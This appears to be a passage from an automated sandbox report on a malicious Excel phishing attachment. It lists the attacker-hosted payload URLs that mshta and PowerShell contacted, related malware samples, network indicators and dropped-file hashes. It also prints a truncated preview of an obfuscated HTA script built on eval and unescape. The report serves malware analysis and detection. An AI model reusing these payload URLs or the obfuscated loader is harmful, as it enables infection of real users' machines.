                                                    http://23.95.235.29/PROCmshta.exe, 00000010.00000002.512540585.0000000002795000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.511567960.0000000002795000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://23.95.235.29/118/freesizepowershell.exe, 00000008.00000002.478285781.00000000028F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.519092403.00000000025E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000003.457783917.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.457378653.0000000003643000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.458227849.0000000003643000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.485183469.000000001C2A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.509326140.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.512076956.00000000027B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512557717.00000000027B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://23.95.235.29/118/sup/greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.htalife=fluffmshta.exe, 00000004.00000002.457860931.000000000024E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.512248812.00000000002DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      23.95.235.29
                                                      unknownUnited States
                                                      36352AS-COLOCROSSINGUStrue
                                                      151.101.193.137
                                                      cloudinary.map.fastly.netUnited States
                                                      54113FASTLYUSfalse
                                                      170.82.174.30
                                                      unknownBrazil
                                                      2664443LCLOUDINTERNETSERVICESLTDA-EPPBRfalse
                                                      170.82.173.30
                                                      curt.wiz.co.cdn.gocache.netBrazil
                                                      2664443LCLOUDINTERNETSERVICESLTDA-EPPBRfalse
                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1574858
                                                      Start date and time:2024-12-13 17:46:30 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 7m 46s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                      Number of analysed new started processes analysed:28
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • GSI enabled (VBA)
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Sample name:NB PO-104105107108.xls
                                                      Detection:MAL
                                                      Classification:mal100.phis.troj.expl.evad.winXLS@29/38@22/4
                                                      EGA Information:
                                                      • Successful, ratio: 33.3%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 16
                                                      • Number of non-executed functions: 1
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .xls
                                                      • Changed system and user locale, location and keyboard layout to French - France
                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                      • Attach to Office via COM
                                                      • Active ActiveX Object
                                                      • Active ActiveX Object
                                                      • Active ActiveX Object
                                                      • Active ActiveX Object
                                                      • Scroll down
                                                      • Close Viewer
                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 23.47.112.37, 104.17.202.1, 104.17.201.1
                                                      • Excluded domains from analysis (whitelisted): ion.cloudinary.com.edgekey.net, e1315.dsca.akamaiedge.net, resc.cloudinary.com.cdn.cloudflare.net
                                                      • Execution Graph export aborted for target mshta.exe, PID 2772 because there are no executed function
                                                      • Execution Graph export aborted for target mshta.exe, PID 3580 because there are no executed function
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • VT rate limit hit for: NB PO-104105107108.xls
                                                      TimeTypeDescription
                                                      11:48:07API Interceptor139x Sleep call for process: mshta.exe modified
                                                      11:48:14API Interceptor218x Sleep call for process: powershell.exe modified
                                                      11:48:23API Interceptor20x Sleep call for process: wscript.exe modified
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      23.95.235.29greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                      • 23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIF
                                                      Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
                                                      • 23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta
                                                      nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                      • 23.95.235.29/808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIF
                                                      invoice09850.xlsGet hashmaliciousRemcosBrowse
                                                      • 23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta
                                                      Invoice A037.xlsGet hashmaliciousUnknownBrowse
                                                      • 23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta
                                                      151.101.193.137stage2.ps1Get hashmaliciousPureLog Stealer, RevengeRAT, zgRATBrowse
                                                        New Order Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                          greatnew.docGet hashmaliciousRemcosBrowse
                                                            https://link.mail.beehiiv.com/ss/c/SFMS2DGC_3bR2eTtelyfFUzhcGs9TWsEeQw8nQp279J9B9upNohe5IND2DzRg4GfFe3uzMCkwl0VCcFF4p9tdZ71PSC4SlxBXIoR6qgai_e9KXQu46yVwLcidRn-ax90dry5wHpUbN5t2kTBuqVHtjiUR148OM6f2kzv0FbM9-j2d8Pfv1aAiA8m-jIRZ1qPGcwv7cKHtg7zS7k4vguTCgqcLvbDJq61ZPMm3FUyJbd-2ROdV-1aYJVxlO48nGuxkYE6PJ8AjBLfTrwxiX4S2X3JBdpAgH-S1qPrWFIUFnwhW_rcr9w0IZhVJg2k6UwPe0XxcmVm_hXa3Zy0nKOCBvO11zW3IuzS0wT0aqoeUGhUZL_BJAovHWU-78ta_hn0kcmqrlBzh66Yb9lBLgDUfmEypG1yBWRlXPRZ1w7redaJaooKiPuwr2V5n8bXDS9_yWg2USHIOqCrcsTtBGYogmSv3HnV9rD8TCUiXo47xhMBVMzr7StZWjjgT4kZsxK7CX-zIn8YCCC8lkjyOEp6xgdXFjETIB4df5tQm7lBbPlCZ99btsVwezxOnJZ4MV1piJOH9CONfmhGD5405v_OGQ0ddDY5d31qqadrUj9T5uo/422/2hUrqrZHQZSMSqb_7MA2RQ/h1/bXAkiKjrMazQzzpENtDvosiaH2ZRcmZd0aMxcbDunvMGet hashmaliciousUnknownBrowse
                                                              https://www.searchunify.comGet hashmaliciousUnknownBrowse
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                cloudinary.map.fastly.netgreatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                • 151.101.1.137
                                                                goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                • 151.101.1.137
                                                                creamkissingthingswithcreambananapackagecreamy.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                • 151.101.1.137
                                                                Cot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
                                                                • 151.101.129.137
                                                                Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
                                                                • 151.101.1.137
                                                                stage2.ps1Get hashmaliciousPureLog Stealer, RevengeRAT, zgRATBrowse
                                                                • 151.101.193.137
                                                                nicegirlforyou.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                • 151.101.1.137
                                                                invoice09850.xlsGet hashmaliciousRemcosBrowse
                                                                • 151.101.65.137
                                                                Invoice A037.xlsGet hashmaliciousUnknownBrowse
                                                                • 151.101.1.137
                                                                Plugin81139.jsGet hashmaliciousPureLog Stealer, RevengeRAT, zgRATBrowse
                                                                • 151.101.129.137
                                                                curt.wiz.co.cdn.gocache.netInquiry_0476452.xlsGet hashmaliciousRemcosBrowse
                                                                • 170.82.174.30
                                                                paste.eegreatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                • 104.21.84.67
                                                                goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                • 172.67.187.200
                                                                creamkissingthingswithcreambananapackagecreamy.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                • 104.21.84.67
                                                                Cot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
                                                                • 188.114.97.6
                                                                SOA USD67,353.35.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                • 188.114.97.6
                                                                Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
                                                                • 188.114.96.6
                                                                print preview.jsGet hashmaliciousFormBookBrowse
                                                                • 172.67.187.200
                                                                nicegirlforyou.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                • 104.21.84.67
                                                                nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                • 104.21.84.67
                                                                invoice09850.xlsGet hashmaliciousRemcosBrowse
                                                                • 188.114.97.6
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                AS-COLOCROSSINGUSjOlYP2b2P4.elfGet hashmaliciousXmrigBrowse
                                                                • 107.172.43.186
                                                                smb.ps1Get hashmaliciousXmrigBrowse
                                                                • 107.172.43.186
                                                                AI7f43Z7AC.exeGet hashmaliciousUnknownBrowse
                                                                • 107.172.88.151
                                                                3S52TCXLd6.exeGet hashmaliciousXmrigBrowse
                                                                • 107.172.43.186
                                                                job.ps1Get hashmaliciousDcRat, StormKitty, VenomRATBrowse
                                                                • 5.252.235.172
                                                                job.ps1Get hashmaliciousDcRat, StormKitty, VenomRATBrowse
                                                                • 5.252.235.172
                                                                greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                • 192.3.101.149
                                                                goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                • 107.172.44.175
                                                                creamkissingthingswithcreambananapackagecreamy.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                • 192.210.150.24
                                                                Cot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
                                                                • 192.210.150.24
                                                                FASTLYUShttps://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly95NE81LnN0YXJ5bm91c2UucnUvdDV2My8=Get hashmaliciousUnknownBrowse
                                                                • 151.101.2.137
                                                                FW_ TBI Construction Company.emlGet hashmaliciousUnknownBrowse
                                                                • 199.232.210.172
                                                                https://jzd.soundestlink.com/ce/c/675b6e1bfc42b5dba74070ce/675b749b3d33226215120f3d/675b74b8f9a08fb1fbb286b7?signature=81a859d5cb272e6f3445dc5d43d3615d4aeb95f10d42be0925098a8a87224f29Get hashmaliciousUnknownBrowse
                                                                • 151.101.2.137
                                                                https://afw.soundestlink.com/ce/c/675c127e5a5226f9e7b86686/675c13ae85cd17d1e3e2ab54/675c13c9f9a08fb1fbb3e577?signature=3f4d77f7452e61cf1e0cb9ce4a3540d02af0944caf975b089573a2fc1d891103Get hashmaliciousUnknownBrowse
                                                                • 151.101.1.229
                                                                https://www.paypal.com/signin/?returnUri=%2Fmyaccount%2Ftransfer%2FpayRequest%2FU-28V552122R769381L%2FU-9FX296329A817750Y%3FclassicUrl%3D%2FUS%2Fcgi-bin%2F%3Fcmd%3D_prq&id=5qLXPqTuQhupi40uiyjfsgz5IGEJYuHctFy29w&expId=p2pGuestTesla&onboardData=%7B%22signUpRequest%22%3A%7B%22method%22%3A%22get%22%2C%22url%22%3A%22https%3A%2F%2Fwww.paypal.com%2Fmyaccount%2Ftransfer%2FguestLogin%2FpayRequest%2FU-28V552122R769381L%2FU-9FX296329A817750Y%3FclassicUrl%3D%2FUS%2Fcgi-bin%2F%3Fcmd%3D_prq%26id%3D5qLXPqTuQhupi40uiyjfsgz5IGEJYuHctFy29w%22%7D%7D&flowContextData=W58KV1fhgiV_-p6TmOnneAd3pqRwh89Uhs4nETqYgEciadinFvE9jhmCkm7cdS_dog5IstycO3uCeUP_fQvJGb2CyrXWo1FAcV7pf2HjOlGJnjX-3TcP_Kr96BnUqBXJTigKvgCmlKpHJdV1cj2DzXB0hguAYEiUIg9m9RdD4qaHMBzBLcVwygEiNxwxkozO_z0SwgJxNPt8O4MHkVy2NY7qoPv_3Qc2wClzrugADG-NhMNqbj3Hc7kBOJYLRna0_RTgDo2VtDqetkbvf00Dw7Z1NgHN2eMtByMS8uM3oO2yZ1XiigiIC6xt56W3JkKVnZbqlDxq6DTjyjnZ&v=1&utm_source=unp&utm_medium=email&utm_campaign=RT000186&utm_unptid=5f308ca0-b964-11ef-bd32-dbf3023831b4&ppid=RT000186&cnac=US&rsta=en_US%28en-US%29&unptid=5f308ca0-b964-11ef-bd32-dbf3023831b4&calc=f639462de6a7c&unp_tpcid=requestmoney-notifications-requestee&page=main%3Aemail%3ART000186&pgrp=main%3Aemail&e=cl&mchn=em&s=ci&mail=sys&appVersion=1.295.0&tenant_name=&xt=145585%2C150948%2C104038&link_ref=www.paypal.com_signinGet hashmaliciousUnknownBrowse
                                                                • 151.101.193.21
                                                                https://poplast-poplast.powerappsportals.com/?e=e83cfd89&h=e7e60467&f=y&p=y&l=1Get hashmaliciousUnknownBrowse
                                                                • 151.101.66.137
                                                                Employee Bonus for Ronnie.benton.docxGet hashmaliciousUnknownBrowse
                                                                • 151.101.2.137
                                                                Employee Bonus for Ronnie.benton.docxGet hashmaliciousUnknownBrowse
                                                                • 151.101.130.137
                                                                https://docs.google.com/presentation/d/e/2PACX-1vTBMx4bSFDj_B_GCJTdTqUpVgpLXyQPR3uFGYP9j81KKHswOSbzMWDM5ZByYtVAwpACe-iOzHmzehje/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                                                                • 151.101.67.6
                                                                https://app.seesaw.me/pages/shared_item?item_id=item.458620ed-6ab6-4874-8a90-aa31b75d3cd6&share_token=lEkLLLT6TUehqWhupDFOAA&mode=shareGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                • 151.101.2.217
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                05af1f5ca1b87cc9cc9b25185115607drcNDmdah2W.docGet hashmaliciousUnknownBrowse
                                                                • 151.101.193.137
                                                                SLNA_Updated_Medical_Grant_Application(1).docxGet hashmaliciousUnknownBrowse
                                                                • 151.101.193.137
                                                                CMR ART009.docxGet hashmaliciousUnknownBrowse
                                                                • 151.101.193.137
                                                                Cot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
                                                                • 151.101.193.137
                                                                Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
                                                                • 151.101.193.137
                                                                510005940.docx.docGet hashmaliciousUnknownBrowse
                                                                • 151.101.193.137
                                                                invoice09850.xlsGet hashmaliciousRemcosBrowse
                                                                • 151.101.193.137
                                                                Invoice A037.xlsGet hashmaliciousUnknownBrowse
                                                                • 151.101.193.137
                                                                Request for quote.docGet hashmaliciousSnake KeyloggerBrowse
                                                                • 151.101.193.137
                                                                NESTLE_MEXICO_Purchase_Order_10122024.xlsGet hashmaliciousUnknownBrowse
                                                                • 151.101.193.137
                                                                7dcce5b76c8b17472d024758970a406bPyrNUtAUkw.docxGet hashmaliciousUnknownBrowse
                                                                • 170.82.174.30
                                                                • 170.82.173.30
                                                                SLNA_Updated_Medical_Grant_Application(1).docxGet hashmaliciousUnknownBrowse
                                                                • 170.82.174.30
                                                                • 170.82.173.30
                                                                CMR ART009.docxGet hashmaliciousUnknownBrowse
                                                                • 170.82.174.30
                                                                • 170.82.173.30
                                                                Cot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
                                                                • 170.82.174.30
                                                                • 170.82.173.30
                                                                Estado.de.cuenta.xlsGet hashmaliciousAveMaria, UACMeBrowse
                                                                • 170.82.174.30
                                                                • 170.82.173.30
                                                                SOA USD67,353.35.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                • 170.82.174.30
                                                                • 170.82.173.30
                                                                Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
                                                                • 170.82.174.30
                                                                • 170.82.173.30
                                                                510005940.docx.docGet hashmaliciousUnknownBrowse
                                                                • 170.82.174.30
                                                                • 170.82.173.30
                                                                Document.xlaGet hashmaliciousUnknownBrowse
                                                                • 170.82.174.30
                                                                • 170.82.173.30
                                                                xeroxscan.DocxGet hashmaliciousUnknownBrowse
                                                                • 170.82.174.30
                                                                • 170.82.173.30
                                                                No context
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):15189
                                                                Entropy (8bit):5.0343247648743
                                                                Encrypted:false
                                                                SSDEEP:384:nWraVoGIpN6KQkj2Lkjh4iUxTnaVjvCnS/OdBmRWDf:nW+V3IpNBQkj2Oh4iUxDaVjvCnS/OdBD
                                                                MD5:7BC3FB6565E144A52C5F44408D5D80DF
                                                                SHA1:C3C443BF9F29EAA84B0A580FD5469F4C5CC57F77
                                                                SHA-256:EF6A75C051D70322EDCD5A89E6398CC00E3D860E87A0C7981310D30837CBA495
                                                                SHA-512:D0A936BAF2277884518EDF4729F88DA74C7BAA5BBB58C1060CE66DE92A23694EA993CA69D8820816C5D28182E9A38EE59DE821EE3A73F0D85DBBC74D406285A5
                                                                Malicious:false
                                                                Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........V.7...?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet.........._.7...[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):64
                                                                Entropy (8bit):0.34726597513537405
                                                                Encrypted:false
                                                                SSDEEP:3:Nlll:Nll
                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                Malicious:false
                                                                Preview:@...e...........................................................
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:HTML document, ASCII text, with very long lines (65450), with CRLF line terminators
                                                                Category:modified
                                                                Size (bytes):147238
                                                                Entropy (8bit):2.7410433201293185
                                                                Encrypted:false
                                                                SSDEEP:768:t1EVeI6Abum2oum2Lh5KUJDVUKhCiGVf/AwZTZGPJZ9adxfv1g4ZZZZZZZZZZZZV:tQ
                                                                MD5:B4A181AD1ACD008C45BA11FD3B518CA2
                                                                SHA1:60B4D2B833454C10D8588A67C018498EBFE9E7F5
                                                                SHA-256:83FC39130474AFEB1D69B21603B9E7495584741EDA2CA2248DB4730D4E966705
                                                                SHA-512:724C770C0F5E06FE62C99FC12546CD9C7F807CAE7091E3386613B3C48831EE1748E70B227175FCDB183B71F52F300F208019C45D4712847DDC87AD254A572DB9
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_Obshtml, Description: Yara detected obfuscated html page, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greatnicefeatureswithsupercodebnaturalthingsinlineforgiven[1].hta, Author: Joe Security
                                                                Preview:<Script Language='Javascript'>.. HTML Encryption provided by tufat.com -->.. ..document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%62%6F%64%79%3E%0A%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%3C%21%2D%2D%20%0A%65%76%61%6C%28%75%6E%65%73%63%61%70%65%28%27%25%36%36%25%37%35%25%36%65%25%36%33%25%37%34%25%36%39%25%36%66%25%36%65%25%32%30%25%37%34%25%33%35%25%33%32%25%33%33%25%33%30%25%36%32%25%36%32%25%36%34%25%33%36%25%36%36%25%32%38%25%37%33%25%32%39%25%32%30%25%37%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%32%25%32%30%25%33%64%25%32%30%25%32%32%25%32%32%25%33%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%34%25%36%64%25%37%30%25%32%30%25%33%64%25%32%30%25%37%33%25%32%65%25%37%33%25%37%30%25%36%63%25%36%39%25%37%34%25%32%38%25%32%32%25%33%31%25%33%38%25%33%38%25%33%32%25%33%35%25%33%31%25%33%31%25%33%33%25%32%32%25%32%39%25%33%62%25%30%61%25%30%39%
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:Unicode text, UTF-16, little-endian text, with very long lines (3267), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):154006
                                                                Entropy (8bit):3.8112193041441667
                                                                Encrypted:false
                                                                SSDEEP:3072:3jl+x01Ehsnlxjjl+x01Ehsnl9jl+x01Ehsnle:3jlE0osnlxjjlE0osnl9jlE0osnle
                                                                MD5:F4FA61BB6C9F9721DED8D91D28EA7815
                                                                SHA1:10796E5D198B6007586D28F6EAF2E847F89EA51E
                                                                SHA-256:CBF1E928A1D028328AFCE5A494996571A51203D9C7E06EE78CD8AE1907F81F53
                                                                SHA-512:03CF806A49AC6FB1D739E986E81559241D2387AF2BB93DD443DEE04F8F7278D1CAD45116C46951D1888FD43922D232E6A9F1B49139C61E961EFEA0D2DE0B7013
                                                                Malicious:false
                                                                Preview:...... . . . .....B.Z.i.W.K.e.l.L.q.L.b.L.q.a.P. .=. .".A.P.N.C.B.k.x.G.W.a.c.h.W.n.L.".....t.b.i.b.m.a.j.q.i.C.c.f.P.W.W. .=. .".H.h.d.W.c.C.W.v.W.m.L.N.r.c.W.".....f.l.B.L.W.p.K.o.H.c.U.i.L.L.C. .=. .".L.W.r.z.Z.A.z.i.W.W.R.L.R.l.L.".........f.f.c.e.L.Q.Z.z.m.W.f.q.P.L.i. .=. .".k.N.Z.H.Z.t.W.c.G.p.Z.H.T.x.J.".....c.f.G.K.h.Z.C.e.L.h.m.Z.o.K.u. .=. .".W.Q.u.Q.v.L.L.Q.l.W.p.c.d.P.B.".....O.W.a.e.H.N.J.c.z.v.K.a.L.O.K. .=. .".p.l.n.h.I.P.R.j.O.a.H.n.f.b.o.".....e.A.t.H.K.n.A.K.U.S.O.W.P.i.W. .=. .".i.u.G.P.B.n.q.c.G.l.W.c.B.L.p.".....v.c.B.N.Z.d.n.L.A.p.i.c.k.j.U. .=. .".K.U.h.L.K.c.K.j.K.u.i.l.q.r.L.".....P.O.z.U.z.o.G.I.K.L.i.G.l.n.c. .=. .".e.z.p.a.o.f.h.l.K.L.c.Z.P.W.W.".....I.L.U.l.b.z.W.Z.c.K.W.m.k.e.b. .=. .".W.A.k.a.L.c.W.H.z.U.p.b.i.u.v.".....A.c.i.p.Z.l.L.i.g.e.K.c.e.U.n. .=. .".R.G.R.T.o.o.u.U.i.t.R.Z.p.l.U.".....W.z.W.N.k.T.L.o.Z.p.m.r.W.o.W. .=. .".o.f.K.c.x.q.C.l.i.S.j.e.N.A.L.".....G.l.z.Z.u.l.L.T.k.i.t.i.G.A.Q. .=. .".W.p.U.U.f.i.c.d.f.l.k.W.W.z.i.".....K.n.K.p.T.L.f.Z.
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                Category:dropped
                                                                Size (bytes):8084
                                                                Entropy (8bit):2.5551694039574895
                                                                Encrypted:false
                                                                SSDEEP:96:j+RiOO++Z39FAcRwxBdEtzBfCC7Boff8oBJ6ANQ4HJV:jtGNOzBArH
                                                                MD5:721E8AAC81F0A6D4659831CB8194D668
                                                                SHA1:6BE0CEFAEC9F0B1EAD9DE03C8D4679767CF8B549
                                                                SHA-256:E52DF310BB20C42F738A3C8E03ED4110CB795B8A07AE5D4E474EA075564B1622
                                                                SHA-512:24CACEED3153493E34988C35628FAA2C198C9B13AFDD8ABC214EFBA0ACCD0579BADCD5EB0F76F5BDA16D3A279DB4DF4BB218ABD5FFD751C6E62676BD1AAEF2E7
                                                                Malicious:false
                                                                Preview:....l.........../...n............9...... EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o...'.......................%...........................................................L...d...........>...............q.......!..............?...........?................................R...p...................................A.r.i.a.l...............................................
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                Category:dropped
                                                                Size (bytes):13284
                                                                Entropy (8bit):2.721890413361754
                                                                Encrypted:false
                                                                SSDEEP:96:9pyRiCCyydtY5YkBJYstgWqjmLRQS1lkQJ8/tIdSUsQ5lV:9joObWPb1pGpQR
                                                                MD5:64389AE456210E7353BD9F7D9C8EBB26
                                                                SHA1:2E2A820EEC50A0CAF659C8A1747A2C161A81A067
                                                                SHA-256:26F6FE29563F2DE0D66D9EB2F963F00CBA0211E9F1DA8BBCDC9426E76B328ACE
                                                                SHA-512:FF679773F635DBD0FC940B880D04D77FB18786EA566CA83A348CBA36FA82EAFFD1AA76D9D4871C66580AED5FD65A8187C29C3A0BBAD8E38D0C83CA2C7886D5D7
                                                                Malicious:false
                                                                Preview:....l...........#...V...........Z&...... EMF.....3..K.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................$...W..."...........!...............................................$...W..."...........!...............................................$...W..."...........!...............................................$...W..."...........!...............................................$...W...R...p.................................. C.a.l.i.b.r.i........................................................................................'/....h./...'/........................h./.............../.N.'/.............m'/../.............../......./......./...'/........../.../..'/
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                Category:dropped
                                                                Size (bytes):109544
                                                                Entropy (8bit):4.282675970330063
                                                                Encrypted:false
                                                                SSDEEP:768:I4KlWqWxZiDQ4hHdCUeHxCDJB9Cnh3KCg0F9BV:I42WxF4MyeKCV
                                                                MD5:F7B9A8F20E64B2CB6B572BCBA5866236
                                                                SHA1:2F092A0A518639332BE76BF60DBB966AC331D356
                                                                SHA-256:72447B22A4BBC05B9E9183DF2ADB712AB51C3A45C6247C2303024197D1623F57
                                                                SHA-512:4A78624A9EB02208F3F30D03CC53EBE00BDD2C59E8F7719E35E706D51CD2F8D0D330BE6D6FAD2A9652536F888CB99E0CBE1E3B97A05EA65CB5914C37C501B728
                                                                Malicious:false
